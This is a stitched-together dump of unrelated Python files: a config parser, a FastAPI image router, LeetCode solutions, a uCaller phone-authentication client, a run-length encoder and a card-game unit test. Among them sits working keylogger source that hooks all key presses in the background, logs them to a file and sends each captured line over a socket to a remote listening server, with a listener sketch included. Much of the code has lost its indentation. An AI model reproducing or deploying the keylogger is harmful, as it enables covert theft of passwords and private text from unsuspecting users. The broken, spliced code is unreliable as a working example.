import os
from configparser import ConfigParser
import logging
log = logging.getLogger(__name__)
def parsing():
# default values
cfg = {
'imgext': '.png, .jpg, .jpeg, .tiff, .bmp, .gif',
'audext': '.wav, .mp3, .flac, .m4a',
'separator': '-, .',
'ssr': '6',
'show_search_result': '0',
'codec': 'mpeg4',
'outext': '.mp4',
'threads': '4',
'fps': '1'
}
file = os.path.join(os.path.dirname(__file__), 'config.ini')
    if not os.path.exists(file):
lines = [
"[extensions]",
"; image extensions",
"imgext = .png, .jpg, .jpeg, .tiff, .bmp, .gif",
"; Audio extensions",
"audext = .wav, .mp3, .flac, .m4a",
"\n",
"; parsing tracknumber options",
"[parsing]",
"; separators:",
"separator = -, .",
"; separator_search_range:",
"ssr = 6",
"; show separator_search_result on debug mode (0 false 1 true):" ,
"show_search_result = 0",
"\n",
"[output]",
"; output codec:",
"codec = mpeg4",
"; output extension:",
"outext = .mp4",
"; output threads:",
"threads = 4",
"; output fps:",
"fps = 1"
]
with open(file, 'w') as w:
w.write('\n'.join(line for line in lines))
parser = ConfigParser()
parser.read(file)
# unpacking sections
sections = [*parser.sections()]
for section in sections:
for key in parser[section]:
if key in ['imgext', 'audext']:
                cfg[key] = tuple(value.strip() for value in parser[section][key].split(','))
elif key == 'separator':
## separator: '-, .' on dict
cfg[key] = parser[section][key].split(',')
cfg[key] = [i.strip() for i in cfg[key]]
                if '.' in cfg[key]:
                    cfg[key] = [i.replace('.', r'\.') for i in cfg[key]]
cfg[key] = '|'.join(i for i in cfg[key])
elif key in ['ssr', 'show_search_result', 'threads', 'fps']:
cfg[key] = int(parser[section][key])
else:
cfg[key] = parser[section][key]
log.debug(f'Config:\n {cfg}')
return cfg |
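# Example usage of the parsing() helper above (hypothetical sketch): the returned
# dict holds tuples for the extension lists and a regex-ready separator pattern.
#
#   import re
#   cfg = parsing()
#   name = "01 - intro.wav"
#   if name.endswith(cfg['audext']):                  # tuple of extensions works with str.endswith
#       track = re.split(cfg['separator'], name)[0]   # e.g. '01 '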
from app import main
from typing import Optional
from fastapi import APIRouter, Body, Depends
from starlette import status
from app.api.dependencies.database import get_repository
from app.db.repositories.project1_words import Project1WordsRepository
from app.models.domain.words import Word
from app.services.image_helpers import (
create_bitmap_from_word,
create_bitmap_from_calendar
)
from app.services.calendar_helpers import (
get_calendar_for_this_week
)
from fastapi.responses import StreamingResponse
from app.core.config import settings
import datetime as dt
from app.models.schemas.words import (
WordOutWithIdDate,
WordShortOutUpdate
)
from app.resources import strings
import io
router = APIRouter()
def iterfile(path: str):
with open(path, mode="rb") as file_like:
yield from file_like
@router.get(
"/next",
response_model=WordOutWithIdDate,
name="project1_server:get-next-word",
)
async def project1_get_next(
words_repo: Project1WordsRepository = Depends(get_repository(Project1WordsRepository)),
) -> WordOutWithIdDate:
if settings.o365_account:
all_events = get_calendar_for_this_week(settings.o365_account.schedule())
return StreamingResponse(
io.BytesIO(create_bitmap_from_calendar(all_events, output="__buffer")),
media_type="image/jpeg"
)
else:
dictword = await words_repo.get_1_random_dictword()
return dictword
@router.get(
"/next_bitmap",
name="project1_server:get-next-bitmap",
)
async def project1_get_next_bitmap(
    words_repo: Project1WordsRepository = Depends(get_repository(Project1WordsRepository)),
) -> StreamingResponse:
#TODO: next_engine will decide which content will be served at this moment
if (dt.datetime.now().minute % 2 == 0) and settings.o365_account:
all_events = get_calendar_for_this_week(settings.o365_account.schedule())
return StreamingResponse(
io.BytesIO(create_bitmap_from_calendar(all_events, output="__buffer")),
media_type="image/jpeg"
)
else:
dictword = await words_repo.get_1_random_dictword()
if dictword.type==strings.TYPE_STATIC_FILE:
path = strings.PATH_STATIC_FOLDER + dictword.fullword
return StreamingResponse(iterfile(path), media_type="image/jpeg")
else:
return StreamingResponse(
io.BytesIO(create_bitmap_from_word(dictword, output="__buffer")),
media_type="image/jpeg"
)
# @router.get(
# "/next_bitmap_from_file",
# name="project1_server:get-next-bitmap-from-file",
# )
# def project1_get_next_from_file(
# ) -> WordOutWithIdDate:
# return StreamingResponse(
# iterfile(strings.PATH_STATIC_FOLDER + "ausserhalb_1bit.bmp"),
# media_type="image/jpeg"
# )
# @router.get(
# "/",
# response_model=ListOfWordOutWithIdDate,
# name="project1_words:get-words-by-path-query",
# )
# async def get_words_by_path_query(
# word: str,
# words_repo: Project1WordsRepository = Depends(get_repository(Project1WordsRepository)),
# ) -> ListOfWordOutWithIdDate:
# # test = await words_repo.get_all_dictwords(word=word)
# words = await words_repo.get_dictwords_by_word(word=word)
# return ListOfWordOutWithIdDate(words=words)
# @router.get(
# "/{word_id}",
# response_model=WordOutWithIdDate,
# name="project1_words:get-word-by-id-by-query",
# )
# async def get_word_by_id_path_query(
# word_id: int,
# words_repo: Project1WordsRepository = Depends(get_repository(Project1WordsRepository)),
# ) -> WordOutWithIdDate:
# print("here")
# dictword = await words_repo.get_dictword_by_id(id=word_id)
# return dictword
# @router.post(
# "/",
# status_code=status.HTTP_201_CREATED,
# response_model=WordShortOutCreate,
# name="project1_words:create-new-dictword",
# )
# async def create_new_word(
# word_create: Word,
# words_repo: Project1WordsRepository = Depends(get_repository(Project1WordsRepository)),
# # user: User = Depends(get_current_user_authorizer()),
# ) -> WordShortOutCreate:
# word_row_created = await words_repo.create_new_dictword(
# word=word_create.word,
# type=word_create.type,
# fullword=word_create.fullword,
# content=word_create.content,
# )
# return word_row_created
# @router.put(
# "/{word_id}",
# status_code=status.HTTP_201_CREATED,
# response_model=WordShortOutUpdate,
# name="project1_words:update-existing-dictword-by-id",
# )
# async def update_dictword_by_id(
# word_id: int,
# word_update: Word,
# words_repo: Project1WordsRepository = Depends(get_repository(Project1WordsRepository)),
# # user: User = Depends(get_current_user_authorizer()),
# ) -> WordOutWithIdDate:
# word_row_updated = await words_repo.update_dictword_row_by_id(
# id=word_id,
# dictword=word_update
# )
# return word_row_updated
# @router.delete(
# "/{word_id}",
# status_code=status.HTTP_200_OK,
# name="project1_words:delete-dictword-from-db",
# )
# async def delete_dictword_from_db(
# word_id: int,
# words_repo: Project1WordsRepository = Depends(get_repository(Project1WordsRepository)),
# ) -> int:
# r = await words_repo.delete_dictword(id=word_id)
# return {"id": r}
|
from time import sleep, time
from datetime import datetime as dt
from shutil import copy as copyfile
from socket import socket, AF_INET, SOCK_STREAM
import keyboard
from keyboard import KeyboardEvent
try:
from conf import SPECIAL_KEYS, SERVER_ACTIVE, SERVER_ADDR, SERVER_PORT
except ImportError:
print("Could not find conf.py!\nTrying to copy DEFAULT config to conf.py...")
copyfile("./DEFAULT_conf.py", "./conf.py")
from conf import SPECIAL_KEYS, SERVER_ACTIVE, SERVER_ADDR, SERVER_PORT
print("Successful!")
class MyKLogger:
def __init__(self) -> None:
self._keys: list[str] = []
self._special_mappings = SPECIAL_KEYS
def _log_key(self, key_event: KeyboardEvent):
self._keys.append(key_event.name)
if len(self._keys) >= 32 and key_event.name == "enter":
line = self._parse_text()
if SERVER_ACTIVE:
self._send_to_server(line)
self._dump_to_file(line)
def _parse_text(self) -> str:
"""Parses text from logged key-strokes
Returns:
str: Parsed string
"""
line = ""
last = ""
for key in self._keys:
if key in self._special_mappings.keys():
last = self._special_mappings[key]
elif key == "backspace":
if len(last) == 0:
last = " "
line = line[:-len(last)]
last = ""
continue
elif len(key) > 1:
if len(key) == 2 and key[0] == "f":
last = "<"+key+">"
else:
last = ""
else:
last = key
line += last
return line
def _dump_to_file(self, line: str):
with open("./key.log", "a", encoding="UTF-8") as klog_file:
klog_file.write(f"{dt.fromtimestamp(int(time()))}:\n{line}\n")
self._keys = []
def run_logger(self, duration: int):
"""Runs a key logger.
This function is blocking program execution for <duration> seconds!\n
Continues logging keys even when out of focus!
Args:
duration (int): How long the logger will run.
"""
self.start_logger()
sleep(duration)
self.stop_logger()
def start_logger(self):
"""Starts a key logger in the background.
"""
keyboard.on_press(self._log_key)
def stop_logger(self):
"""Stops active logger.
"""
keyboard.unhook_all()
        self._dump_to_file(self._parse_text())
def _send_to_server(self, line: str):
"""Send parsed line to listener Server
Args:
line (str): Parsed text from keyboard input
"""
line_bytes = line.encode("UTF-8")
with socket(AF_INET, SOCK_STREAM) as sock:
sock.connect((SERVER_ADDR, SERVER_PORT))
sock.sendall(line_bytes)
def __del__(self):
self.stop_logger()
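def run_listener(addr: str = SERVER_ADDR, port: int = SERVER_PORT):
    """Minimal sketch of the listener that _send_to_server() talks to.
    This is an assumption about the receiving side (run it as a separate
    script/process): it accepts one connection per parsed line and prints it.
    """
    with socket(AF_INET, SOCK_STREAM) as srv:
        srv.bind((addr, port))
        srv.listen()
        while True:
            conn, _ = srv.accept()
            with conn:
                chunks = []
                while True:
                    chunk = conn.recv(4096)
                    if not chunk:
                        break
                    chunks.append(chunk)
                print(b"".join(chunks).decode("UTF-8", errors="replace"))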
if __name__ == "__main__":
klog = MyKLogger()
klog.start_logger()
while True:
sleep(3600)
|
'''
Teemo Attacking
In the world of League of Legends, there is a hero called "Teemo" whose attacks put the enemy hero Ashe (the Frost Archer) into a poisoned condition. Given Teemo's attack time series on Ashe and the poison duration per attack, output the total time that Ashe is poisoned.
You may assume that Teemo attacks at the given time points and that Ashe becomes poisoned immediately.
Example 1:
Input: [1,4], 2
Output: 4
Explanation: At the beginning of second 1, Teemo attacks Ashe and poisons her immediately. The poison lasts 2 seconds, ending at the end of second 2.
At the beginning of second 4, Teemo attacks again and gives Ashe another 2 seconds of poison.
So the final answer is 4 seconds.
Example 2:
Input: [1,2], 2
Output: 3
Explanation: At the beginning of second 1, Teemo attacks Ashe and poisons her immediately. The poison lasts 2 seconds, ending at the end of second 2.
But at the beginning of second 2, Teemo attacks Ashe again while she is already poisoned.
Since poison does not stack, the attack at the beginning of second 2 wears off at the end of second 3.
So the final answer is 3.
Notes:
You may assume the total length of the time series array does not exceed 10,000.
You may assume the numbers in Teemo's attack time series and the poison duration are non-negative integers that do not exceed 10,000,000.
'''
from typing import List
'''
Approach: array scan
Let endTime be the time when the poison from the previous attack wears off, and totalTime the accumulated total poison time so far.
Up to the current attack time curTime, the total poison time is updated as:
if curTime >= endTime:  # the previous poison has already worn off, so this attack contributes a full duration
    totalTime = totalTime + duration
else:  # this attack overlaps the previous poison, so subtract the overlapping part
    totalTime = totalTime - (endTime - curTime) + duration
Following this analysis, iterate over all attack times and accumulate the total poison time.
Time complexity: O(n)
Space complexity: O(1)
'''
class Solution:
def findPoisonedDuration(self, timeSeries: List[int], duration: int) -> int:
totalTime, endTime = 0, 0
for curTime in timeSeries:
            if curTime >= endTime:  # the previous poison has already worn off, so this attack adds a full duration
totalTime = totalTime + duration
            else:  # this attack overlaps the previous poison, so subtract the overlapping portion
totalTime = totalTime - (endTime - curTime) + duration
endTime = curTime + duration
return totalTime
s = Solution()
print(s.findPoisonedDuration([1, 4], 2))
print(s.findPoisonedDuration([1, 2], 2))
|
from re import match
import requests
from .exception import SetSession, SetServiceId, SetKey, ParamSetException, GetException
class BaseUCaller:
__REGEX_PHONE = r'^(\+7|7|8)?[\s\-]?\(?[489][0-9]{2}\)?[\s\-]?[0-9]{3}[\s\-]?[0-9]{2}[\s\-]?[0-9]{2}$'
__ORG_URL = "https://ucaller.ru/"
__DOC_URL = "https://ucaller.ru/doc"
__ERROR_UCALLER = {
"0": "Ваш IP адрес заблокирован",
"1": "Не переданы какие-либо требуемые GET параметры",
"2": "Неверная комбинация GET параметров `service_id` и `key`",
"3": "Возникла ошибка при инициализации авторизации (неверный номер телефона или тех. работы)",
"4": "Работа вашего сервиса отключена в настройках",
"5": "[Тестовый режим] Вы не прошли верификацию номера телефона в личном кабинете",
"6": "[Тестовый режим] Баланс бесплатных тестовых авторизаций исчерпан",
"7": "[Тестовый режим] Переданный GET параметр `phone` не разрешен (на него не пройдена верификация)",
"8": "Проверьте максимально допустимую длину передаваемых значений",
"9": "Авторизация для этой страны запрещена настройками географии работы в личном кабинете",
"10": "Этот uCaller id не существует или у вас нет к нему доступа",
"11": "Авторизация не может быть бесплатно повторена, время истекло",
"12": "Авторизация не может быть бесплатно повторена, лимит исчерпан",
"13": "Ошибочная попытка бесплатной инициализации повторной авторизации",
"14": "[Widget] Неверный формат переданного ucaller-response",
"15": "[Widget] Такого ответа ucaller-response не существует",
"16": "[Widget] Виджет отключен в настройках",
"17": "[Widget] Ключи виджета нельзя использовать для API Classic",
"18": "Достигнут лимит в 4 исходящих звонка в минуту или 15 вызовов в день для одного номера",
"1000": "Этот метод API временно недоступен",
"1001": "Ваш аккаунт заблокирован",
"1002": "Недостаточно средств на балансе аккаунта",
"1003": "С этого IP запрещено обращаться к API этого сервиса",
"1004": "Сервис заархивирован",
}
def __init__(
self,
service_id: int,
key: str,
session: requests.Session = None
):
"""
:param service_id: ID of the service you created
:param key: string == 32 characters
:param session: A Requests session. default = None
"""
self.__service_id = service_id
if len(key) > 32:
raise SetKey(
self.__class__.__qualname__,
                "key",
                f"[ERROR] длина key > 32 символов: len(key) = {len(key)}",
100,
)
self.__key = key
if session is not None:
self.__session = session
else:
self.__session = requests.Session()
self.__session.headers = {
'ContentType': 'application/json',
'Accept': 'application/json',
'Content-Encoding': 'utf-8'
}
self.__base_url = "https://api.ucaller.ru/"
self.__version_api = "v1.0"
def __doc_uCaller__(self) -> str:
"""
Вернёт ссылку на документацию api uCaller
:return: string with url the documentation api uCaller
"""
return self.__DOC_URL
def __service_url__(self):
"""
Вернёт ссылку на сайт uCaller
:return: string with url the site uCaller
"""
return self.__ORG_URL
@property
def error_codes(self) -> dict:
"""
Вернёт словарь код:значение
:return: dict code:value
"""
return self.__ERROR_UCALLER
@property
def base_url(self) -> str:
return self.__base_url
@base_url.setter
def base_url(self, url: str):
self.__base_url = url
@property
def version_api(self) -> str:
return self.__version_api
@version_api.setter
def version_api(self, version: str):
self.__version_api = version
@property
def regex_phone(self) -> str:
return self.__REGEX_PHONE
@regex_phone.setter
def regex_phone(self, regex: str):
self.__REGEX_PHONE = regex
@property
def service_id(self) -> int:
return self.__service_id
@service_id.setter
def service_id(self, service_id: int):
if service_id == self.__service_id:
raise SetServiceId(
self.__class__.__qualname__,
                "service_id",
f"[ERROR] id сервиса совпадает с изменяемым id")
else:
self.__service_id = service_id
@property
def key(self) -> str:
"""
Cекретный ключ
:return: string == 32 characters
"""
return self.__key
@key.setter
def key(self, key: str):
"""
Изменение секретного ключа
:param key: string == 32 characters
"""
if len(key) > 32:
raise SetKey(
self.__class__.__qualname__,
                "key",
                f"[ERROR] длина key > 32 символов: len(key) = {len(key)}",
)
else:
self.__key = key
@property
def session(self) -> requests.Session:
"""
A Requests session
:return: object requests.Session
"""
return self.__session
@session.setter
def session(self, session: requests.Session = None):
"""
Изменение сессии
:param session: A Requests session
"""
if session is None:
raise SetSession(
self.__class__.__qualname__,
                "session",
f"[ERROR] Не присвоен объект типа requests.Session")
else:
self.__session = session
@classmethod
def check_phone(cls, phone: str):
if match(cls.__REGEX_PHONE, phone):
return True
return False
@classmethod
def change_phone(cls, phone):
if phone[0] == "+" and phone[1] == "7":
phone = phone[1:]
elif phone[0] == "7":
phone = phone
elif phone[0] == "8":
phone = f"7{phone[1:]}"
else:
            phone = f"7{phone}"
return phone
def check_error_code(self, error_code):
"""
:param error_code: Код ошибки
:return: Вернёт описание либо None
"""
if str(error_code) in self.__ERROR_UCALLER.keys():
return self.__ERROR_UCALLER.get(str(error_code), None)
return None
class APIUCaller(BaseUCaller):
def init_call(self, phone: str, code, client: str = None, unique: str = None, timeout=60) -> dict:
"""
Данный метод позволяет инициализировать авторизацию для пользователя вашего приложения.
URL обращения для инициализации метода: https://api.ucaller.ru/v1.0/initCall
Способ передачи параметров: GET
:param phone: string phone number
:param code: string == 4 characters
:param client: Набор символов До 64 символов
:param unique: Набор символов До 64 символов
:param timeout: timeout request, default = 60 sec
:return: смотрите APIExampleResponse.example_response_init_сall
"""
if not self.check_phone(phone=phone):
raise ParamSetException(
self.__class__.__qualname__,
self.init_call.__name__,
f"[ERROR] неверный формат телефона \n+79999999999\n79999999999\n9999999999"
)
        if not isinstance(code, str):
            raise ParamSetException(
                self.__class__.__qualname__,
                self.init_call.__name__,
                f"[ERROR] параметр \"code\" не является строкой"
            )
        elif len(code) != 4:
raise ParamSetException(
self.__class__.__qualname__,
self.init_call.__name__,
f"[ERROR] Кол-во символов параметра \"code\", больше либо меньше 4"
)
        elif client is not None and len(str(client)) > 64:
raise ParamSetException(
self.__class__.__qualname__,
self.init_call.__name__,
f"[ERROR] Кол-во символов параметра \"client\", больше 64"
)
if unique is not None:
if type(unique) != str:
unique = str(unique)
if len(str(unique)) > 64:
raise ParamSetException(
self.__class__.__qualname__,
self.init_call.__name__,
f"[ERROR] Кол-во символов параметра \"unique\", больше 64"
)
phone = self.change_phone(phone)
try:
result = self.session.get(
f"{self.base_url}{self.version_api}/initCall?service_id={self.service_id}&key={self.key}&phone={phone}" +
f"&code={code}{f'&client={client}' if client is not None else ''}" +
f"{f'&unique={unique}' if unique is not None else ''}",
timeout=timeout,
)
return result.json()
except requests.exceptions.RequestException as err:
raise GetException(
self.__class__.__qualname__,
self.init_call.__name__,
f"[ERROR] Не удалось инициализировать авторизацию\n{err}"
)
def init_repeat(self, uid: str, timeout=60) -> dict:
"""
В случае, если ваш пользователь не получает звонок инициализированный методом initCall, вы можете два раза и
совершенно бесплатно инициализировать повторную авторизацию по uCaller ID, который вы получаете в ответе
метода initCall. Повторную авторизацию можно запросить только в течение пяти минут с момента выполнения
основной авторизации методом initCall. Все данные, например `code` или `phone`, совпадают с теми же,
которые были переданы в первом запросе initCall.
URL обращения для инициализации метода: https://api.ucaller.ru/v1.0/initRepeat
Способ передачи параметров: GET
:param uid:
:param timeout: timeout request
:return: смотрите APIExampleResponse.example_response_get_repeat
"""
try:
result = self.session.get(
f"{self.base_url}{self.version_api}/initRepeat?service_id={self.service_id}&key={self.key}&uid={uid}",
timeout=timeout
)
return result.json()
except requests.exceptions.RequestException as err:
raise GetException(
self.__class__.__qualname__,
self.init_repeat.__name__,
f"[ERROR] Не удалось повторить авторизацию\n{err}"
)
def get_info(self, uid: str, timeout=60) -> dict:
"""
Этот метод возвращает развернутую информацию по уже осуществленному uCaller ID.
:param uid: uCaller ID переданный в ответе init_сall
:param timeout: timeout request
:return: смотрите APIExampleResponse.example_response_get_info
"""
try:
result = self.session.get(
f"{self.base_url}{self.version_api}/getInfo?service_id={self.service_id}&key={self.key}&uid={uid}",
timeout=timeout
)
return result.json()
except requests.exceptions.RequestException as err:
raise GetException(
self.__class__.__qualname__,
self.get_info.__name__,
f"[ERROR] Не удалось получить развернутую информацию по уже осуществленному uCaller ID\n{err}"
)
def get_balance(self, timeout=60) -> dict:
"""
Этот метод возвращает информацию по остаточному балансу.
URL обращения для инициализации метода: https://api.ucaller.ru/v1.0/getBalance
Способ передачи параметров: GET
:param timeout: timeout request
:return: смотрите APIExampleResponse.example_response_get_balance
"""
try:
result = self.session.get(
f"{self.base_url}{self.version_api}/getBalance?service_id={self.service_id}&key={self.key}",
timeout=timeout
)
return result.json()
except requests.exceptions.RequestException as err:
raise GetException(
self.__class__.__qualname__,
self.get_balance.__name__,
f"[ERROR] Не удалось получить информацию по остаточному балансу\n{err}"
)
def get_service(self, timeout=60) -> dict:
"""
Этот метод возвращает информацию по сервису.
URL обращения для инициализации метода: https://api.ucaller.ru/v1.0/getService
Способ передачи параметров: GET
:param timeout: timeout request
:return: смотрите APIExampleResponse.example_response_get_service
"""
try:
result = self.session.get(
f"{self.base_url}{self.version_api}/getService?service_id={self.service_id}&key={self.key}",
timeout=timeout
)
return result.json()
except requests.exceptions.RequestException as err:
raise GetException(
self.__class__.__qualname__,
self.get_service.__name__,
                f"[ERROR] Не удалось получить информацию по сервису\n{err}"
)
class APIExampleResponse:
# noinspection PyMethodMayBeStatic
def example_response_get_info(self) -> dict:
"""
Вернёт пример ответа метода get_info
:return: will return an example of the response of the 'get_info' method
"""
return {
"status": True, # true в случае успеха, false в случае неудачи
"ucaller_id": 103000, # запрошенный uCaller ID
"init_time": 1556617525, # время, когда была инициализирована авторизация
"call_status": -1,
# Статус звонка, -1 = информация проверяется (от 1 сек до 1 минуты), 0 = дозвониться не удалось, 1 = звонок осуществлен
"is_repeated": False,
# является ли этот uCaller ID повтором (initRepeat), если да, будет добавлен first_ucaller_id с первым uCaller ID этой цепочки
"repeatable": False, # возможно ли инициализировать бесплатные повторы (initRepeat)
"repeat_times": 2, # Появляется в случае repeatable: true, говорит о количестве возможных повторов
"repeated_ucaller_ids": [103001, 103002], # цепочка uCaller ID инициализированных повторов (initRepeat)
"unique": "f32d7ab0-2695-44ee-a20c-a34262a06b90", # ключ идемпотентности (если был передан)
"client": "nickname", # идентификатор пользователя переданный клиентом (если был передан)
"phone": 79991234567, # номер телефона пользователя, куда мы совершали звонок
"code": 7777, # код авторизации
"country_code": "RU", # ISO код страны пользователя
"country_image": "https://static.ucaller.ru/flag/ru.svg", # изображение флага страны пользователя
"phone_info": [ # информация по телефону, информация может отличаться от примера
{
"operator": "МТС", # Оператор связи
"region": "Республика Татарстан", # регион субъеккта Российской федерации
"mnp": "Мегафон" # Если у номера был сменен оператор - MNP покажет нового оператора
}
],
"cost": 0.3 # сколько стоила эта авторизация клиенту
}
# noinspection PyMethodMayBeStatic
def example_response_init_repeat(self) -> dict:
"""
Вернёт пример ответа метода init_repeat
:return: will return an example of the response of the 'init_repeat' method
"""
return {
"status": True,
"ucaller_id": 103001,
"phone": 79991234567,
"code": 7777,
"client": "nickname",
"unique_request_id": "f32d7ab0-2695-44ee-a20c-a34262a06b90",
"exists": True,
"free_repeated": True, # показывает, что осуществлена повторная авторизация
}
# noinspection PyMethodMayBeStatic
def example_response_init_call(self) -> dict:
"""
Вернёт пример ответа метода init_call
:return: will return an example of the response of the 'init_call' method
"""
return {
"status": True, # True в случае успеха, false в случае неудачи
"ucaller_id": 103000,
# уникальный ID в системе uCaller, который позволит проверять статус и инициализировать метод initRepeat
"phone": 79991234567, # номер телефона, куда мы совершили звонок
"code": 7777, # код, который будет последними цифрами в номере телефона
"client": "nickname", # идентификатор пользователя переданный клиентом
"unique_request_id": "f32d7ab0-2695-44ee-a20c-a34262a06b90",
# появляется только если вами был передан параметр `unique`
"exists": True
# появляется при переданном параметре `unique`, если такой запрос уже был инициализирован ранее
}
# noinspection PyMethodMayBeStatic
def example_response_get_balance(self) -> dict:
"""
Вернёт пример ответа метода get_balance
:return: will return an example of the response of the 'get_balance' method
"""
return {
"status": True, # True в случае успеха, false в случае неудачи
"rub_balance": 84.6, # Остаточный баланс на рублевом счете аккаунта
"bonus_balance": 0, # Остаточный бонусный баланс
"tariff": "startup", # Кодовое значение вашего тарифного плана
"tariff_name": "Старт-ап" # Название тарифного плана
}
# noinspection PyMethodMayBeStatic
def example_response_get_service(self) -> dict:
"""
Вернёт пример ответа метода get_service
:return: will return an example of the response of the 'get_service' method
"""
return {
"status": True, # true в случае успеха, false в случае неудачи
"service_status": 1692, # ID сервиса
"name": "ВКонтакте", # Название сервиса
"creation_time": 1556064401, # Время создания сервиса в unix формате
"last_request": 1556707453, # Время последнего не кэшированного обращения к API сервиса в unix формате
"owner": "[email protected]", # E-mail адрес владельца сервиса
"use_direction": "ВКонтакте приложение", # Информация о том, где будет использоваться сервис
"now_test": True, # Состояние тестового режима на текущий момент
"test_info": {
"test_requests": 89, # Оставшееся количество бесплатных тестовых обращений
"verified_phone": 79991234567 # Верифицированный номер телефона для тестовых обращений
}
}
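# Hypothetical usage sketch of the client defined above (service_id and key are
# placeholders; init_call performs a real GET request to the uCaller API).
if __name__ == "__main__":
    api = APIUCaller(service_id=123456, key="x" * 32)
    try:
        print(api.init_call(phone="+79991234567", code="4321", client="nickname"))
    except (ParamSetException, GetException) as err:
        print(err)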
|
#!/usr/bin/env python3
"""
Author : saminamomtaz <saminamomtaz@localhost>
Date : 2021-11-16
Purpose: Run-length encoding/data compression
"""
import argparse
import os
# --------------------------------------------------
def get_args():
"""Get command-line arguments"""
parser = argparse.ArgumentParser(
description='Run-length encoding/data compression',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('text',
metavar='str',
help='DNA text or file')
args = parser.parse_args()
if os.path.isfile(args.text):
        args.text = open(args.text).read().rstrip()
return args
# --------------------------------------------------
def rle(seq):
""" Create RLE """
final = []
count = 1
for ind, base in enumerate(seq):
if ind == len(seq)-1:
final += base
if count > 1:
final += str(count)
elif base == seq[ind+1]:
count = count+1
else:
final += base
if count > 1:
final += str(count)
count = 1
return ''.join(final)
# --------------------------------------------------
def test_rle():
""" Test rle """
assert rle('A') == 'A'
assert rle('ACGT') == 'ACGT'
assert rle('AA') == 'A2'
assert rle('AAAAA') == 'A5'
assert rle('ACCGGGTTTT') == 'AC2G3T4'
# --------------------------------------------------
def main():
"""Make a jazz noise here"""
args = get_args()
for seq in args.text.splitlines():
print(rle(seq))
# --------------------------------------------------
if __name__ == '__main__':
main()
|
from typing import List


class Solution:
    def fourSumCount(self, A: List[int], B: List[int], C: List[int], D: List[int]) -> int:
dicA = {}
dicB = {}
dicC = {}
dicD = {}
for i in A:
if i in dicA.keys():
dicA[i] += 1
else:
                dicA[i] = 1
for i in B:
for j in dicA.keys():
if i+j in dicB:
dicB[i+j] += dicA[j]
else:
dicB[i+j] = dicA[j]
for i in C:
if i in dicC.keys():
dicC[i] += 1
else:
                dicC[i] = 1
for i in D:
for j in dicC.keys():
if i+j in dicD:
dicD[i+j] += dicC[j]
else:
dicD[i+j] = dicC[j]
        ans = 0
for i in dicD.keys():
if -i in dicB.keys():
ans += dicB[-i]*dicD[i]
return ans
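# Quick self-check with the canonical example for this problem:
# A=[1,2], B=[-2,-1], C=[-1,2], D=[0,2] has exactly two zero-sum tuples.
if __name__ == "__main__":
    print(Solution().fourSumCount([1, 2], [-2, -1], [-1, 2], [0, 2]))  # expected: 2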
|
import unittest
from QuattroComponents.Player import Anonymous_player
from QuattroComponents.Card import Card
from TestModule.GetMethodName import get_method_name_decorator
from collections import deque
def reset_player_attributes(anonymous: Anonymous_player):
anonymous.player1_changed = False
anonymous.player2_changed = False
class AnonymousPlayerTest(unittest.TestCase):
    # the exact origin_card does not matter for these tests
origin_card = Card(number=1, color="green", isOpen=False)
method_names = set()
@get_method_name_decorator
def test_correct_zero_card_change(self):
# Zero idx 0
anonymous = Anonymous_player(user_name="anonymous", user_deck=[
Card(number=0, color="zero", isOpen=False),
Card(number=1, color="red", isOpen=False),
Card(number=2, color="red", isOpen=False)
])
opened_deck = deque([])
return_card = anonymous.handle_card_change(user_name='player2', origin_card=self.origin_card, opened_deck=opened_deck)
self.assertEqual(return_card.number, 0)
self.assertEqual(return_card.color, 'zero')
self.assertTrue(anonymous.player2_changed)
# Zero idx 1
reset_player_attributes(anonymous=anonymous)
self.origin_card.isOpen = False
anonymous = Anonymous_player(user_name="anonymous", user_deck=[
Card(number=1, color="red", isOpen=False),
Card(number=0, color="zero", isOpen=False),
Card(number=2, color="red", isOpen=False)
])
opened_deck = deque([])
return_card = anonymous.handle_card_change(user_name='player2', origin_card=self.origin_card, opened_deck=opened_deck)
self.assertEqual(return_card.number, 0)
self.assertEqual(return_card.color, 'zero')
self.assertTrue(anonymous.player2_changed)
# Zero idx 2
reset_player_attributes(anonymous=anonymous)
self.origin_card.isOpen = False
anonymous = Anonymous_player(user_name="anonymous", user_deck=[
Card(number=1, color="red", isOpen=False),
Card(number=2, color="red", isOpen=False),
Card(number=0, color="zero", isOpen=False)
])
opened_deck = deque([])
return_card = anonymous.handle_card_change(user_name='player2', origin_card=self.origin_card,
opened_deck=opened_deck)
self.assertEqual(return_card.number, 0)
self.assertEqual(return_card.color, 'zero')
self.assertTrue(anonymous.player2_changed)
# with opened_deck
reset_player_attributes(anonymous=anonymous)
self.origin_card.isOpen = False
anonymous = Anonymous_player(user_name="anonymous", user_deck=[
Card(number=1, color="red", isOpen=False),
Card(number=2, color="red", isOpen=False),
Card(number=0, color="zero", isOpen=False)
])
opened_deck = deque([Card(number=3, color="blue", isOpen=False)])
return_card = anonymous.handle_card_change(user_name='player2', origin_card=self.origin_card,
opened_deck=opened_deck)
self.assertEqual(return_card.number, 0)
self.assertEqual(return_card.color, 'zero')
self.assertTrue(anonymous.player2_changed)
@get_method_name_decorator
def test_made_quattro_card_change(self):
anonymous = Anonymous_player(user_name="anonymous", user_deck=[
Card(number=1, color="blue", isOpen=False),
Card(number=1, color="yellow", isOpen=False),
Card(number=1, color="red", isOpen=False)
])
opened_deck = deque([
Card(number=6, color="blue", isOpen=True),
Card(number=6, color="red", isOpen=True),
Card(number=6, color="green", isOpen=True)
])
return_card = anonymous.handle_card_change(user_name='player2', origin_card=self.origin_card,
opened_deck=opened_deck)
self.assertEqual(return_card.number, 1)
self.assertEqual(return_card.color, 'yellow')
self.assertTrue(anonymous.player2_changed)
@get_method_name_decorator
def test_top_card_change(self):
anonymous = Anonymous_player(user_name="anonymous", user_deck=[
Card(number=1, color="blue", isOpen=False),
Card(number=2, color="red", isOpen=False),
Card(number=1, color="red", isOpen=False)
])
opened_deck = deque([
Card(number=6, color="blue", isOpen=True),
Card(number=6, color="red", isOpen=True),
Card(number=6, color="green", isOpen=True)
])
return_card = anonymous.handle_card_change(user_name='player2', origin_card=self.origin_card,
opened_deck=opened_deck)
self.assertEqual(return_card.number, 2)
self.assertEqual(return_card.color, 'red')
self.assertTrue(anonymous.player2_changed)
reset_player_attributes(anonymous=anonymous)
self.origin_card.isOpen = False
anonymous.user_deck = [
Card(number=2, color="blue", isOpen=False),
Card(number=2, color="red", isOpen=False),
Card(number=1, color="red", isOpen=False)
]
opened_deck = deque([
Card(number=6, color="blue", isOpen=True),
Card(number=6, color="red", isOpen=True),
Card(number=6, color="green", isOpen=True)
])
